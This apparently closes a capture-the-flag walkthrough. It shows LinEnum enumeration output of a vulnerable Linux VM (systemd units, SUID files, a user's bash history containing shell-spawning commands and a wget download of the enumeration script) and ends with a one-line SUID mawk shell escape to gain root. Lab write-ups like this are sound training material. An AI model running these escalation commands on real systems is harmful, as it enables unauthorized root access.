lrwxrwxrwx 1 root root    9 Apr  8  2017 hwclock.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root   28 Apr  8  2017 kmod.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root   28 Apr  8  2017 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root    9 Apr  8  2017 motd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 mountall.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root   22 Apr  8  2017 procps.service -> systemd-sysctl.service
lrwxrwxrwx 1 root root   16 Apr  8  2017 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root    9 Apr  8  2017 reboot.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root   15 Apr  8  2017 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 Apr  8  2017 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root   17 Apr  8  2017 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Apr  8  2017 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Apr  8  2017 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root   16 Apr  8  2017 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root   13 Apr  8  2017 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root    9 Apr  8  2017 sendsigs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 stop-bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root   27 Apr  8  2017 urandom.service -> systemd-random-seed.service
lrwxrwxrwx 1 root root    9 Apr  8  2017 x11-common.service -> /dev/null
-rw-r--r-- 1 root root  402 Apr  8  2017 debian-fixup.service
-rw-r--r-- 1 root root  342 Apr  8  2017 getty-static.service
-rw-r--r-- 1 root root  398 Apr  8  2017 hwclock-save.service
-rw-r--r-- 1 root root  380 Apr  8  2017 ifup@.service
-rw-r--r-- 1 root root  271 Apr  8  2017 systemd-setup-dgram-qlen.service
-rw-r--r-- 1 root root  217 Apr  8  2017 udev-finish.service
-rw-r--r-- 1 root root  770 Apr  8  2017 console-getty.service
-rw-r--r-- 1 root root  741 Apr  8  2017 console-shell.service
-rw-r--r-- 1 root root  783 Apr  8  2017 container-getty@.service
-rw-r--r-- 1 root root 1010 Apr  8  2017 debug-shell.service
-rw-r--r-- 1 root root  986 Apr  8  2017 emergency.service
-rw-r--r-- 1 root root 1.5K Apr  8  2017 getty@.service
-rw-r--r-- 1 root root  565 Apr  8  2017 halt-local.service
-rw-r--r-- 1 root root  630 Apr  8  2017 initrd-cleanup.service
-rw-r--r-- 1 root root  790 Apr  8  2017 initrd-parse-etc.service
-rw-r--r-- 1 root root  640 Apr  8  2017 initrd-switch-root.service
-rw-r--r-- 1 root root  664 Apr  8  2017 initrd-udevadm-cleanup-db.service
-rw-r--r-- 1 root root  675 Apr  8  2017 kmod-static-nodes.service
-rw-r--r-- 1 root root  473 Apr  8  2017 mail-transport-agent.target
-rw-r--r-- 1 root root  635 Apr  8  2017 quotaon.service
-rw-r--r-- 1 root root  633 Apr  8  2017 rc-local.service
-rw-r--r-- 1 root root  954 Apr  8  2017 rescue.service
-rw-r--r-- 1 root root 1.1K Apr  8  2017 serial-getty@.service
-rw-r--r-- 1 root root  653 Apr  8  2017 systemd-ask-password-console.service
-rw-r--r-- 1 root root  681 Apr  8  2017 systemd-ask-password-wall.service
-rw-r--r-- 1 root root  776 Apr  8  2017 systemd-backlight@.service
-rw-r--r-- 1 root root 1011 Apr  8  2017 systemd-binfmt.service
-rw-r--r-- 1 root root  725 Apr  8  2017 systemd-fsck-root.service
-rw-r--r-- 1 root root  678 Apr  8  2017 systemd-fsck@.service
-rw-r--r-- 1 root root  544 Apr  8  2017 systemd-halt.service
-rw-r--r-- 1 root root  501 Apr  8  2017 systemd-hibernate.service
-rw-r--r-- 1 root root  710 Apr  8  2017 systemd-hostnamed.service
-rw-r--r-- 1 root root  519 Apr  8  2017 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root  480 Apr  8  2017 systemd-initctl.service
-rw-r--r-- 1 root root 1.1K Apr  8  2017 systemd-journald.service
-rw-r--r-- 1 root root  698 Apr  8  2017 systemd-journal-flush.service
-rw-r--r-- 1 root root  557 Apr  8  2017 systemd-kexec.service
-rw-r--r-- 1 root root  691 Apr  8  2017 systemd-localed.service
-rw-r--r-- 1 root root 1.2K Apr  8  2017 systemd-logind.service
-rw-r--r-- 1 root root  795 Apr  8  2017 systemd-machined.service
-rw-r--r-- 1 root root 1.1K Apr  8  2017 systemd-modules-load.service
-rw-r--r-- 1 root root  936 Apr  8  2017 systemd-networkd.service
-rw-r--r-- 1 root root  685 Apr  8  2017 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root  605 Apr  8  2017 systemd-nspawn@.service
-rw-r--r-- 1 root root  553 Apr  8  2017 systemd-poweroff.service
-rw-r--r-- 1 root root  681 Apr  8  2017 systemd-quotacheck.service
-rw-r--r-- 1 root root  769 Apr  8  2017 systemd-random-seed.service
-rw-r--r-- 1 root root  841 Apr  8  2017 systemd-readahead-collect.service
-rw-r--r-- 1 root root  638 Apr  8  2017 systemd-readahead-done.service
-rw-r--r-- 1 root root  753 Apr  8  2017 systemd-readahead-replay.service
-rw-r--r-- 1 root root  548 Apr  8  2017 systemd-reboot.service
-rw-r--r-- 1 root root  824 Apr  8  2017 systemd-remount-fs.service
-rw-r--r-- 1 root root  686 Apr  8  2017 systemd-resolved.service
-rw-r--r-- 1 root root  758 Apr  8  2017 systemd-rfkill@.service
-rw-r--r-- 1 root root  475 Apr  8  2017 systemd-shutdownd.service
-rw-r--r-- 1 root root  497 Apr  8  2017 systemd-suspend.service
-rw-r--r-- 1 root root  707 Apr  8  2017 systemd-sysctl.service
-rw-r--r-- 1 root root  655 Apr  8  2017 systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Apr  8  2017 systemd-timesyncd.service
-rw-r--r-- 1 root root  665 Apr  8  2017 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root  770 Apr  8  2017 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root  750 Apr  8  2017 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root  826 Apr  8  2017 systemd-udevd.service
-rw-r--r-- 1 root root  823 Apr  8  2017 systemd-udev-settle.service
-rw-r--r-- 1 root root  715 Apr  8  2017 systemd-udev-trigger.service
-rw-r--r-- 1 root root  757 Apr  8  2017 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root  821 Apr  8  2017 systemd-update-utmp.service
-rw-r--r-- 1 root root  588 Apr  8  2017 systemd-user-sessions.service
-rw-r--r-- 1 root root  497 Apr  8  2017 user@.service
-rw-r--r-- 1 root root  524 Apr  8  2017 basic.target
-rw-r--r-- 1 root root  379 Apr  8  2017 bluetooth.target
-rw-r--r-- 1 root root  394 Apr  8  2017 cryptsetup-pre.target
-rw-r--r-- 1 root root  366 Apr  8  2017 cryptsetup.target
-rw-r--r-- 1 root root  636 Apr  8  2017 dev-hugepages.mount
-rw-r--r-- 1 root root  590 Apr  8  2017 dev-mqueue.mount
-rw-r--r-- 1 root root  431 Apr  8  2017 emergency.target
-rw-r--r-- 1 root root  440 Apr  8  2017 final.target
-rw-r--r-- 1 root root  460 Apr  8  2017 getty.target
-rw-r--r-- 1 root root  490 Apr  8  2017 graphical.target
-rw-r--r-- 1 root root  487 Apr  8  2017 halt.target
-rw-r--r-- 1 root root  447 Apr  8  2017 hibernate.target
-rw-r--r-- 1 root root  468 Apr  8  2017 hybrid-sleep.target
-rw-r--r-- 1 root root  553 Apr  8  2017 initrd-fs.target
-rw-r--r-- 1 root root  526 Apr  8  2017 initrd-root-fs.target
-rw-r--r-- 1 root root  691 Apr  8  2017 initrd-switch-root.target
-rw-r--r-- 1 root root  671 Apr  8  2017 initrd.target
-rw-r--r-- 1 root root  501 Apr  8  2017 kexec.target
-rw-r--r-- 1 root root  395 Apr  8  2017 local-fs-pre.target
-rw-r--r-- 1 root root  507 Apr  8  2017 local-fs.target
-rw-r--r-- 1 root root  405 Apr  8  2017 machine.slice
-rw-r--r-- 1 root root  492 Apr  8  2017 multi-user.target
-rw-r--r-- 1 root root  464 Apr  8  2017 network-online.target
-rw-r--r-- 1 root root  461 Apr  8  2017 network-pre.target
-rw-r--r-- 1 root root  480 Apr  8  2017 network.target
-rw-r--r-- 1 root root  514 Apr  8  2017 nss-lookup.target
-rw-r--r-- 1 root root  473 Apr  8  2017 nss-user-lookup.target
-rw-r--r-- 1 root root  354 Apr  8  2017 paths.target
-rw-r--r-- 1 root root  500 Apr  8  2017 poweroff.target
-rw-r--r-- 1 root root  377 Apr  8  2017 printer.target
-rw-r--r-- 1 root root  693 Apr  8  2017 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root  603 Apr  8  2017 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root  493 Apr  8  2017 reboot.target
-rw-r--r-- 1 root root  396 Apr  8  2017 remote-fs-pre.target
-rw-r--r-- 1 root root  498 Apr  8  2017 remote-fs.target
-rw-r--r-- 1 root root  486 Apr  8  2017 rescue.target
-rw-r--r-- 1 root root  500 Apr  8  2017 rpcbind.target
-rw-r--r-- 1 root root  402 Apr  8  2017 shutdown.target
-rw-r--r-- 1 root root  362 Apr  8  2017 sigpwr.target
-rw-r--r-- 1 root root  420 Apr  8  2017 sleep.target
-rw-r--r-- 1 root root  403 Apr  8  2017 -.slice
-rw-r--r-- 1 root root  409 Apr  8  2017 slices.target
-rw-r--r-- 1 root root  380 Apr  8  2017 smartcard.target
-rw-r--r-- 1 root root  356 Apr  8  2017 sockets.target
-rw-r--r-- 1 root root  380 Apr  8  2017 sound.target
-rw-r--r-- 1 root root  441 Apr  8  2017 suspend.target
-rw-r--r-- 1 root root  353 Apr  8  2017 swap.target
-rw-r--r-- 1 root root  681 Apr  8  2017 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root  518 Apr  8  2017 sysinit.target
-rw-r--r-- 1 root root  719 Apr  8  2017 sys-kernel-config.mount
-rw-r--r-- 1 root root  662 Apr  8  2017 sys-kernel-debug.mount
-rw-r--r-- 1 root root 1.3K Apr  8  2017 syslog.socket
-rw-r--r-- 1 root root  646 Apr  8  2017 systemd-ask-password-console.path
-rw-r--r-- 1 root root  574 Apr  8  2017 systemd-ask-password-wall.path
-rw-r--r-- 1 root root  524 Apr  8  2017 systemd-initctl.socket
-rw-r--r-- 1 root root 1.1K Apr  8  2017 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root  842 Apr  8  2017 systemd-journald.socket
-rw-r--r-- 1 root root  635 Apr  8  2017 systemd-readahead-done.timer
-rw-r--r-- 1 root root  555 Apr  8  2017 systemd-readahead-drop.service
-rw-r--r-- 1 root root  528 Apr  8  2017 systemd-shutdownd.socket
-rw-r--r-- 1 root root  450 Apr  8  2017 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root  578 Apr  8  2017 systemd-udevd-control.socket
-rw-r--r-- 1 root root  575 Apr  8  2017 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root  433 Apr  8  2017 system.slice
-rw-r--r-- 1 root root  652 Apr  8  2017 system-update.target
-rw-r--r-- 1 root root  355 Apr  8  2017 timers.target
-rw-r--r-- 1 root root  395 Apr  8  2017 time-sync.target
-rw-r--r-- 1 root root  661 Apr  8  2017 tmp.mount
-rw-r--r-- 1 root root  417 Apr  8  2017 umount.target
-rw-r--r-- 1 root root  392 Apr  8  2017 user.slice
-rw-r--r-- 1 root root  366 Nov 21  2016 dbus.service
-rw-r--r-- 1 root root  106 Nov 21  2016 dbus.socket
-rw-r--r-- 1 root root  290 Dec 20  2015 rsyslog.service
-rw-r--r-- 1 root root  251 May 14  2015 cron.service
-rw-r--r-- 1 root root  283 Dec 28  2014 anacron-resume.service
-rw-r--r-- 1 root root  183 Dec 28  2014 anacron.service
-rw-r--r-- 1 root root  115 Nov  8  2014 acpid.path
-rw-r--r-- 1 root root  199 Nov  8  2014 acpid.service
-rw-r--r-- 1 root root  115 Nov  8  2014 acpid.socket
-rw-r--r-- 1 root root  169 Sep 30  2014 atd.service

/lib/systemd/system/dbus.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Nov 21  2016 dbus.socket -> ../dbus.socket

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Apr  8  2017 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Apr  8  2017 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Apr  8  2017 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Apr  8  2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Apr  8  2017 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Nov 21  2016 dbus.service -> ../dbus.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Apr  8  2017 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Apr  8  2017 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 25 Apr  8  2017 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 34 Apr  8  2017 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Apr  8  2017 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 27 Apr  8  2017 systemd-shutdownd.socket -> ../systemd-shutdownd.socket
lrwxrwxrwx 1 root root 14 Nov 21  2016 dbus.socket -> ../dbus.socket

/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r--r-- 1 root root 42 Mar 31  2018 forking.conf

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Apr  8  2017 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr  8  2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Apr  8  2017 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr  8  2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr  8  2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr  8  2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/runlevel1.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr  8  2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/runlevel2.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr  8  2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/runlevel3.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr  8  2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/runlevel4.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr  8  2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/runlevel5.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr  8  2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Apr  8  2017 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 31 Apr  8  2017 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 22 Apr  8  2017 udev-finish.service -> ../udev-finish.service
lrwxrwxrwx 1 root root 20 Apr  8  2017 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 23 Apr  8  2017 debian-fixup.service -> ../debian-fixup.service
lrwxrwxrwx 1 root root 22 Apr  8  2017 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Apr  8  2017 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 28 Apr  8  2017 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Apr  8  2017 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 32 Apr  8  2017 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Apr  8  2017 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Apr  8  2017 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Apr  8  2017 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Apr  8  2017 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 27 Apr  8  2017 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 32 Apr  8  2017 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 31 Apr  8  2017 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Apr  8  2017 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Apr  8  2017 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Apr  8  2017 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Apr  8  2017 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 30 Apr  8  2017 systemd-update-utmp.service -> ../systemd-update-utmp.service

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Apr  8  2017 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/networking.service.d:
total 4.0K
-rw-r--r-- 1 root root 84 Apr  8  2017 network-pre.conf

/lib/systemd/network:
total 12K
-rw-r--r-- 1 root root 368 Apr  8  2017 80-container-host0.network
-rw-r--r-- 1 root root 378 Apr  8  2017 80-container-ve.network
-rw-r--r-- 1 root root  73 Apr  8  2017 99-default.link

/lib/systemd/system-generators:
total 412K
-rwxr-xr-x 1 root root 46K Apr  8  2017 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 30K Apr  8  2017 systemd-debug-generator
-rwxr-xr-x 1 root root 26K Apr  8  2017 systemd-default-display-manager-generator
-rwxr-xr-x 1 root root 50K Apr  8  2017 systemd-fstab-generator
-rwxr-xr-x 1 root root 30K Apr  8  2017 systemd-getty-generator
-rwxr-xr-x 1 root root 70K Apr  8  2017 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 34K Apr  8  2017 systemd-insserv-generator
-rwxr-xr-x 1 root root 26K Apr  8  2017 systemd-rc-local-generator
-rwxr-xr-x 1 root root 26K Apr  8  2017 systemd-system-update-generator
-rwxr-xr-x 1 root root 54K Apr  8  2017 systemd-sysv-generator

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 872 Apr  8  2017 90-systemd.preset

/lib/systemd/system-shutdown:
total 0

/lib/systemd/system-sleep:
total 0


### SOFTWARE #############################################
[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1512 Apr 15  2018 /etc/passwd
-rw-r--r-- 1 root root 759 Apr 15  2018 /etc/group
-rw-r--r-- 1 root root 761 Oct 22  2014 /etc/profile
-rw-r----- 1 root shadow 998 Apr 15  2018 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 1085300 Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9468 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 362672 Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 562536 Nov 19  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 78072 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17  2017 /usr/bin/newgrp
-rwsrwxrwx 1 root root 3889608 Aug 13  2016 /usr/bin/python2.7
-rwsr-xr-x 1 root root 43576 May 17  2017 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 50644 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 106908 Mar 23  2012 /usr/bin/mawk
-rwsr-xr-x 1 root root 52344 May 17  2017 /usr/bin/chfn
-rwsr-sr-x 1 root mail 96192 Nov 18  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 26344 Mar 29  2015 /bin/umount
-rwsr-xr-x 1 root root 34684 Mar 29  2015 /bin/mount


[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 106908 Mar 23  2012 /usr/bin/mawk


[+] World-writable SUID files:
-rwsrwxrwx 1 root root 3889608 Aug 13  2016 /usr/bin/python2.7


[+] World-writable SUID files owned by root:
-rwsrwxrwx 1 root root 3889608 Aug 13  2016 /usr/bin/python2.7


[-] SGID files:
-rwxr-sr-x 1 root shadow 34424 May 27  2017 /sbin/unix_chkpwd
-rwxr-sr-x 1 root crontab 38844 Jun  7  2015 /usr/bin/crontab
-rwxr-sr-x 1 root tty 26240 Mar 29  2015 /usr/bin/wall
-rwxr-sr-x 1 root ssh 419192 Nov 19  2017 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 32116 Jun 13  2013 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 61232 May 17  2017 /usr/bin/chage
-rwsr-sr-x 1 daemon daemon 50644 Sep 30  2014 /usr/bin/at
-rwxr-sr-x 1 root mail 13892 Jun  2  2013 /usr/bin/dotlockfile
-rwxr-sr-x 1 root mail 9772 Dec  4  2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root mail 17880 Nov 18  2017 /usr/bin/lockfile
-rwxr-sr-x 1 root tty 9680 Oct 17  2014 /usr/bin/bsd-write
-rwsr-sr-x 1 root mail 96192 Nov 18  2017 /usr/bin/procmail
-rwxr-sr-x 1 root shadow 21964 May 17  2017 /usr/bin/expiry


[+] Files with POSIX capabilities set:
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/bin/ping6 = cap_net_raw+ep
/bin/ping = cap_net_raw+ep


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 191 Sep  7  2014 /etc/libaudit.conf
-rw-r--r-- 1 root root 2084 Mar  6  2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 24 May 17 04:21 /etc/resolv.conf
-rw-r--r-- 1 root root 2584 Feb  7  2014 /etc/gai.conf
-rw-r--r-- 1 root root 599 Feb 19  2009 /etc/logrotate.conf
-rw-r--r-- 1 root root 206 Aug 12  2014 /etc/idmapd.conf
-rw-r--r-- 1 root root 2969 Jun 17  2017 /etc/debconf.conf
-rw-r--r-- 1 root root 2981 Apr 15  2018 /etc/adduser.conf
-rw-r--r-- 1 root root 859 Nov 23  2012 /etc/insserv.conf
-rw-r--r-- 1 root root 34 Apr  9  2017 /etc/ld.so.conf
-rw-r--r-- 1 root root 604 May 15  2012 /etc/deluser.conf
-rw-r--r-- 1 root root 497 May  4  2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 144 Apr 15  2018 /etc/kernel-img.conf
-rw-r--r-- 1 root root 956 Dec 27  2016 /etc/mke2fs.conf
-rw-r--r-- 1 root root 7727 Apr 15  2018 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 552 Nov 12  2016 /etc/pam.conf
-rw-r--r-- 1 root root 279 Jun 13  2013 /etc/updatedb.conf
-rw-r--r-- 1 root root 9 Aug  7  2006 /etc/host.conf
-rw-r--r-- 1 root root 1260 May 26  2014 /etc/ucf.conf
-rw-r--r-- 1 root root 2632 Dec 14  2015 /etc/rsyslog.conf
-rw-r--r-- 1 root root 346 Sep  1  2014 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 3173 Jan  4  2015 /etc/reportbug.conf


[-] Current user's history files:
-rw------- 1 ted ted 1379 May 17 04:24 /home/ted/.bash_history


[-] Location and contents (if accessible) of .bash_history file(s):
/home/ted/.bash_history

ls
id
whoami
/bin/sh -i
exit
ls
cd /home
ls
cd ted
ls
cd /home
ls
sudo -l
clear
ls
which locate
locate apache2
locate apache2.conf
cd /etc/apache2/
clear
ls
cat apache2.conf 
clear
ls
ps -aux | grep root
clear
cd /tmp
clear
ls
wget 192.168.43.182:8000/LinEnum.sh
ls
chmod +x LinEnum.sh
ls
./LinEnum.sh 
locate www-data
ls
cd /var/www
ls
cd html
ls
cd admin
ls
cd ..
cd mail
ls
cd ..
cat post.html 
clear
ls
cd /usr/sbin/rpc.idmapd
cd /usr/sbin/
ls
/usr/sbin/rpc.idmapd
cat /usr/sbin/rpc.idmapd
clear
locate http
clea
clear
cd /var/www
ls
cd html
ls
cd vendo
cd vendor/
ls
cd ,,
cd ..
clear
ls -la
cd admin
ls
cat notes.txt 
ls -la
cd .. | clear
ls
cd ..
ls
cat LICENSE 
cat gulpfile.js 
clear
ls
cd mail
ls
cat contact_me.php 
ls
cd ..
ls
cd post
cat post.html 
clear
ls
cd ..
ls
cd ..
ls
cd mail
l
ls
cat www-data 
cd log
cd .
cd ..
cd log
ls
cd apache2/
cd apt/
ls
cat history.log
cd ..
ls
clear
ls
cd ..
ls
cd www
ls
cd html
ls
ls-la
ls -la
clear
ls
cd in
cat index.html 
clear
ls
less | strings contact.html | grep username
less | cat contact.html | grep username
less contact.html | grep username
cat package-lock.json 
clear
cat package-lock.json | grep username
ls
cat README.md 
clear
cd ..
cd /tmp
ls
./LinEnum.sh 
cd /usr/bin/mawk
cat /usr/bin/mawk
clear
ls
awk 'BEGIN {system("/bin/sh")}'
./Line
./LinEnum.sh 
cear
clear
sudo -l
mawk 'BEGIN {system("/bin/sh")}'
exit


[-] Location and Permissions (if accessible) of .bak file(s):
-rw------- 1 root shadow 998 Apr 15  2018 /var/backups/shadow.bak
-rw------- 1 root shadow 638 Apr 15  2018 /var/backups/gshadow.bak
-rw------- 1 root root 1512 Apr 15  2018 /var/backups/passwd.bak
-rw------- 1 root root 759 Apr 15  2018 /var/backups/group.bak


[-] Any interesting mail in /var/mail:
total 12
drwxrwsr-x  2 root     mail 4096 May 17 03:13 .
drwxr-xr-x 12 root     root 4096 Apr 15  2018 ..
-rw-rw----  1 www-data mail 1553 May 17 03:13 www-data


### SCAN COMPLETE ####################################

SUID mawk

This is probably the vulnerability!

After searching at this site, we can type this command to get root

mawk 'BEGIN {system("/bin/sh")}'

Navigate to /root to get the flag !

Congratulation!

PreviousSar1 NextPrime 1

Last updated 5 years ago

Was this helpful?